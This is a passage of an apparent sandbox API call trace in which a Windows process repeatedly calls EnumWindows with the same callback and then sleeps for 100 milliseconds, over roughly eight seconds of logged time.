lParam=0x2830000) [0243.278] Sleep (dwMilliseconds=0x64) [0243.283] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0243.283] Sleep (dwMilliseconds=0x64) [0243.287] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0243.288] Sleep (dwMilliseconds=0x64) [0243.292] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0243.292] Sleep (dwMilliseconds=0x64) [0243.294] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0243.295] Sleep (dwMilliseconds=0x64) [0243.306] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0243.306] Sleep (dwMilliseconds=0x64) [0243.321] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0243.321] Sleep (dwMilliseconds=0x64) [0243.325] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0243.325] Sleep (dwMilliseconds=0x64) [0243.344] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0243.344] Sleep (dwMilliseconds=0x64) [0243.372] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0243.372] Sleep (dwMilliseconds=0x64) [0243.409] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0243.410] Sleep (dwMilliseconds=0x64) [0243.492] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0243.492] Sleep (dwMilliseconds=0x64) [0243.607] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0243.608] Sleep (dwMilliseconds=0x64) [0243.687] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0243.687] Sleep (dwMilliseconds=0x64) [0243.731] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0243.732] Sleep (dwMilliseconds=0x64) [0243.772] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0243.772] Sleep (dwMilliseconds=0x64) [0243.814] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0243.814] Sleep (dwMilliseconds=0x64) [0243.853] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0243.853] Sleep (dwMilliseconds=0x64) [0243.881] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0243.882] Sleep (dwMilliseconds=0x64) [0243.886] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0243.886] Sleep (dwMilliseconds=0x64) [0243.890] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0243.890] Sleep (dwMilliseconds=0x64) [0243.893] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0243.894] Sleep (dwMilliseconds=0x64) [0243.896] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0243.896] Sleep (dwMilliseconds=0x64) [0243.899] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0243.899] Sleep (dwMilliseconds=0x64) [0243.903] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0243.903] Sleep (dwMilliseconds=0x64) [0243.908] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0243.908] Sleep (dwMilliseconds=0x64) [0243.920] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0243.920] Sleep (dwMilliseconds=0x64) [0243.923] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0243.923] Sleep (dwMilliseconds=0x64) [0244.059] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0244.059] Sleep (dwMilliseconds=0x64) [0244.136] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0244.137] Sleep (dwMilliseconds=0x64) [0244.248] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0244.248] Sleep (dwMilliseconds=0x64) [0244.327] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0244.327] Sleep (dwMilliseconds=0x64) [0244.400] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0244.401] Sleep (dwMilliseconds=0x64) [0244.439] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0244.439] Sleep (dwMilliseconds=0x64) [0244.478] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0244.478] Sleep (dwMilliseconds=0x64) [0244.515] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0244.516] Sleep (dwMilliseconds=0x64) [0244.541] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0244.541] Sleep (dwMilliseconds=0x64) [0244.544] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0244.545] Sleep (dwMilliseconds=0x64) [0244.550] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0244.550] Sleep (dwMilliseconds=0x64) [0244.552] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0244.553] Sleep (dwMilliseconds=0x64) [0244.556] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0244.556] Sleep (dwMilliseconds=0x64) [0244.560] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0244.560] Sleep (dwMilliseconds=0x64) [0244.568] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0244.568] Sleep (dwMilliseconds=0x64) [0244.572] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0244.572] Sleep (dwMilliseconds=0x64) [0244.619] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0244.619] Sleep (dwMilliseconds=0x64) [0244.660] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0244.660] Sleep (dwMilliseconds=0x64) [0244.731] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0244.731] Sleep (dwMilliseconds=0x64) [0244.910] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0244.910] Sleep (dwMilliseconds=0x64) [0245.057] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0245.058] Sleep (dwMilliseconds=0x64) [0245.219] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0245.219] Sleep (dwMilliseconds=0x64) [0245.304] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0245.304] Sleep (dwMilliseconds=0x64) [0245.381] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0245.381] Sleep (dwMilliseconds=0x64) [0245.463] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0245.463] Sleep (dwMilliseconds=0x64) [0245.526] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0245.526] Sleep (dwMilliseconds=0x64) [0245.557] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0245.558] Sleep (dwMilliseconds=0x64) [0245.563] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0245.564] Sleep (dwMilliseconds=0x64) [0245.570] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0245.570] Sleep (dwMilliseconds=0x64) [0245.573] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0245.573] Sleep (dwMilliseconds=0x64) [0245.580] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0245.581] Sleep (dwMilliseconds=0x64) [0245.591] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0245.592] Sleep (dwMilliseconds=0x64) [0245.595] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0245.595] Sleep (dwMilliseconds=0x64) [0245.644] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0245.644] Sleep (dwMilliseconds=0x64) [0245.688] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0245.688] Sleep (dwMilliseconds=0x64) [0245.726] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0245.726] Sleep (dwMilliseconds=0x64) [0245.763] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0245.763] Sleep (dwMilliseconds=0x64) [0245.844] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0245.845] Sleep (dwMilliseconds=0x64) [0245.898] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0245.899] Sleep (dwMilliseconds=0x64) [0245.967] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0245.968] Sleep (dwMilliseconds=0x64) [0246.057] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0246.058] Sleep (dwMilliseconds=0x64) [0246.102] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0246.102] Sleep (dwMilliseconds=0x64) [0246.200] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0246.200] Sleep (dwMilliseconds=0x64) [0246.291] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0246.292] Sleep (dwMilliseconds=0x64) [0246.438] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0246.439] Sleep (dwMilliseconds=0x64) [0246.479] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0246.479] Sleep (dwMilliseconds=0x64) [0246.521] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0246.521] Sleep (dwMilliseconds=0x64) [0246.559] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0246.559] Sleep (dwMilliseconds=0x64) [0246.604] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0246.605] Sleep (dwMilliseconds=0x64) [0246.650] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0246.651] Sleep (dwMilliseconds=0x64) [0246.661] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0246.661] Sleep (dwMilliseconds=0x64) [0246.666] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0246.666] Sleep (dwMilliseconds=0x64) [0246.670] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0246.670] Sleep (dwMilliseconds=0x64) [0246.673] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0246.673] Sleep (dwMilliseconds=0x64) [0246.676] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0246.677] Sleep (dwMilliseconds=0x64) [0246.680] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0246.680] Sleep (dwMilliseconds=0x64) [0246.686] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0246.687] Sleep (dwMilliseconds=0x64) [0246.692] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0246.692] Sleep (dwMilliseconds=0x64) [0246.697] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0246.697] Sleep (dwMilliseconds=0x64) [0246.701] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0246.701] Sleep (dwMilliseconds=0x64) [0246.704] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0246.704] Sleep (dwMilliseconds=0x64) [0246.707] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0246.708] Sleep (dwMilliseconds=0x64) [0246.712] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0246.712] Sleep (dwMilliseconds=0x64) [0246.728] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0246.729] Sleep (dwMilliseconds=0x64) [0246.754] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0246.755] Sleep (dwMilliseconds=0x64) [0246.787] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0246.788] Sleep (dwMilliseconds=0x64) [0246.869] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0246.869] Sleep (dwMilliseconds=0x64) [0246.947] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0246.947] Sleep (dwMilliseconds=0x64) [0247.069] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0247.070] Sleep (dwMilliseconds=0x64) [0247.139] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0247.140] Sleep (dwMilliseconds=0x64) [0247.198] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0247.198] Sleep (dwMilliseconds=0x64) [0247.242] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0247.242] Sleep (dwMilliseconds=0x64) [0247.282] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0247.282] Sleep (dwMilliseconds=0x64) [0247.303] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0247.303] Sleep (dwMilliseconds=0x64) [0247.309] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0247.309] Sleep (dwMilliseconds=0x64) [0247.312] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0247.313] Sleep (dwMilliseconds=0x64) [0247.315] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0247.316] Sleep (dwMilliseconds=0x64) [0247.318] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0247.318] Sleep (dwMilliseconds=0x64) [0247.323] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0247.323] Sleep (dwMilliseconds=0x64) [0247.329] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0247.329] Sleep (dwMilliseconds=0x64) [0247.333] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0247.333] Sleep (dwMilliseconds=0x64) [0247.338] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0247.338] Sleep (dwMilliseconds=0x64) [0247.341] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0247.341] Sleep (dwMilliseconds=0x64) [0247.344] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0247.344] Sleep (dwMilliseconds=0x64) [0247.350] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0247.351] Sleep (dwMilliseconds=0x64) [0247.353] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0247.354] Sleep (dwMilliseconds=0x64) [0247.357] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0247.358] Sleep (dwMilliseconds=0x64) [0247.385] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0247.385] Sleep (dwMilliseconds=0x64) [0247.415] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0247.415] Sleep (dwMilliseconds=0x64) [0247.529] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0247.530] Sleep (dwMilliseconds=0x64) [0247.623] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0247.625] Sleep (dwMilliseconds=0x64) [0247.711] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0247.712] Sleep (dwMilliseconds=0x64) [0247.799] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0247.799] Sleep (dwMilliseconds=0x64) [0247.921] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0247.921] Sleep (dwMilliseconds=0x64) [0247.973] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0247.973] Sleep (dwMilliseconds=0x64) [0248.056] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0248.056] Sleep (dwMilliseconds=0x64) [0248.103] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0248.103] Sleep (dwMilliseconds=0x64) [0248.122] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0248.123] Sleep (dwMilliseconds=0x64) [0248.131] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0248.132] Sleep (dwMilliseconds=0x64) [0248.140] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0248.140] Sleep (dwMilliseconds=0x64) [0248.179] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0248.179] Sleep (dwMilliseconds=0x64) [0248.186] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0248.186] Sleep (dwMilliseconds=0x64) [0248.189] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0248.189] Sleep (dwMilliseconds=0x64) [0248.198] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0248.198] Sleep (dwMilliseconds=0x64) [0248.224] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0248.224] Sleep (dwMilliseconds=0x64) [0248.296] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0248.296] Sleep (dwMilliseconds=0x64) [0248.378] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0248.378] Sleep (dwMilliseconds=0x64) [0248.454] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0248.454] Sleep (dwMilliseconds=0x64) [0248.531] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0248.532] Sleep (dwMilliseconds=0x64) [0248.598] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0248.598] Sleep (dwMilliseconds=0x64) [0248.638] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0248.639] Sleep (dwMilliseconds=0x64) [0248.714] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0248.714] Sleep (dwMilliseconds=0x64) [0248.726] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0248.727] Sleep (dwMilliseconds=0x64) [0248.730] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0248.730] Sleep (dwMilliseconds=0x64) [0248.735] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0248.736] Sleep (dwMilliseconds=0x64) [0248.739] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0248.739] Sleep (dwMilliseconds=0x64) [0248.743] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0248.743] Sleep (dwMilliseconds=0x64) [0248.748] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0248.748] Sleep (dwMilliseconds=0x64) [0248.754] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0248.754] Sleep (dwMilliseconds=0x64) [0248.776] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0248.777] Sleep (dwMilliseconds=0x64) [0248.803] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0248.803] Sleep (dwMilliseconds=0x64) [0248.910] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0248.910] Sleep (dwMilliseconds=0x64) [0248.988] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0248.988] Sleep (dwMilliseconds=0x64) [0249.085] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0249.085] Sleep (dwMilliseconds=0x64) [0249.193] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0249.193] Sleep (dwMilliseconds=0x64) [0249.236] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0249.236] Sleep (dwMilliseconds=0x64) [0249.277] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0249.278] Sleep (dwMilliseconds=0x64) [0249.318] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0249.319] Sleep (dwMilliseconds=0x64) [0249.357] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0249.357] Sleep (dwMilliseconds=0x64) [0249.400] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0249.400] Sleep (dwMilliseconds=0x64) [0249.410] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0249.410] Sleep (dwMilliseconds=0x64) [0249.420] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0249.420] Sleep (dwMilliseconds=0x64) [0249.424] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0249.425] Sleep (dwMilliseconds=0x64) [0249.430] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0249.430] Sleep (dwMilliseconds=0x64) [0249.433] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0249.433] Sleep (dwMilliseconds=0x64) [0249.436] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0249.436] Sleep (dwMilliseconds=0x64) [0249.439] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0249.439] Sleep (dwMilliseconds=0x64) [0249.442] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0249.442] Sleep (dwMilliseconds=0x64) [0249.452] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0249.452] Sleep (dwMilliseconds=0x64) [0249.455] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0249.455] Sleep (dwMilliseconds=0x64) [0249.458] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0249.459] Sleep (dwMilliseconds=0x64) [0249.462] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0249.462] Sleep (dwMilliseconds=0x64) [0249.465] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0249.466] Sleep (dwMilliseconds=0x64) [0249.469] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0249.469] Sleep (dwMilliseconds=0x64) [0249.474] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0249.475] Sleep (dwMilliseconds=0x64) [0249.478] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0249.478] Sleep (dwMilliseconds=0x64) [0249.482] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0249.484] Sleep (dwMilliseconds=0x64) [0249.490] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0249.491] Sleep (dwMilliseconds=0x64) [0249.514] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0249.514] Sleep (dwMilliseconds=0x64) [0249.580] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0249.581] Sleep (dwMilliseconds=0x64) [0249.656] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0249.656] Sleep (dwMilliseconds=0x64) [0249.731] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0249.732] Sleep (dwMilliseconds=0x64) [0249.847] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0249.847] Sleep (dwMilliseconds=0x64) [0250.089] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.089] Sleep (dwMilliseconds=0x64) [0250.127] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.127] Sleep (dwMilliseconds=0x64) [0250.194] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.194] Sleep (dwMilliseconds=0x64) [0250.226] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.227] Sleep (dwMilliseconds=0x64) [0250.234] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.235] Sleep (dwMilliseconds=0x64) [0250.241] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.241] Sleep (dwMilliseconds=0x64) [0250.244] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.244] Sleep (dwMilliseconds=0x64) [0250.248] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.248] Sleep (dwMilliseconds=0x64) [0250.252] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.253] Sleep (dwMilliseconds=0x64) [0250.259] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.259] Sleep (dwMilliseconds=0x64) [0250.282] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.282] Sleep (dwMilliseconds=0x64) [0250.313] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.316] Sleep (dwMilliseconds=0x64) [0250.327] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.327] Sleep (dwMilliseconds=0x64) [0250.380] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.380] Sleep (dwMilliseconds=0x64) [0250.444] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.445] Sleep (dwMilliseconds=0x64) [0250.524] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.524] Sleep (dwMilliseconds=0x64) [0250.602] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.602] Sleep (dwMilliseconds=0x64) [0250.692] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.693] Sleep (dwMilliseconds=0x64) [0250.764] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.765] Sleep (dwMilliseconds=0x64) [0250.805] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.806] Sleep (dwMilliseconds=0x64) [0250.810] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.812] Sleep (dwMilliseconds=0x64) [0250.815] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.815] Sleep (dwMilliseconds=0x64) [0250.821] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.821] Sleep (dwMilliseconds=0x64) [0250.826] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.827] Sleep (dwMilliseconds=0x64) [0250.830] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.830] Sleep (dwMilliseconds=0x64) [0250.833] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.833] Sleep (dwMilliseconds=0x64) [0250.839] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.839] Sleep (dwMilliseconds=0x64) [0250.843] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.843] Sleep (dwMilliseconds=0x64) [0250.846] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.846] Sleep (dwMilliseconds=0x64) [0250.848] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.849] Sleep (dwMilliseconds=0x64) [0250.851] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.851] Sleep (dwMilliseconds=0x64) [0250.857] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.858] Sleep (dwMilliseconds=0x64) [0250.866] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.867] Sleep (dwMilliseconds=0x64) [0250.871] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.871] Sleep (dwMilliseconds=0x64) [0250.874] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.874] Sleep (dwMilliseconds=0x64) [0250.895] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.895] Sleep (dwMilliseconds=0x64) [0250.900] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.900] Sleep (dwMilliseconds=0x64) [0250.903] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.903] Sleep (dwMilliseconds=0x64) [0250.911] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.912] Sleep (dwMilliseconds=0x64) [0250.961] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0250.962] Sleep (dwMilliseconds=0x64) [0251.028] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0251.029] Sleep (dwMilliseconds=0x64) [0251.184] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0251.185] Sleep (dwMilliseconds=0x64) [0251.270] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0251.270] Sleep (dwMilliseconds=0x64) [0251.403] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0251.403] Sleep (dwMilliseconds=0x64) [0251.487] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0251.487] Sleep (dwMilliseconds=0x64) [0251.527] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0251.527] Sleep (dwMilliseconds=0x64) [0251.567] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0251.568] Sleep (dwMilliseconds=0x64) [0251.572] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0251.572] Sleep (dwMilliseconds=0x64) [0251.575] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0251.575] Sleep (dwMilliseconds=0x64) [0251.579] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0251.579] Sleep (dwMilliseconds=0x64) [0251.583] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0251.583] Sleep (dwMilliseconds=0x64) [0251.591] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0251.591] Sleep (dwMilliseconds=0x64) [0251.594] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0251.594] Sleep (dwMilliseconds=0x64) [0251.603] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0251.604] Sleep 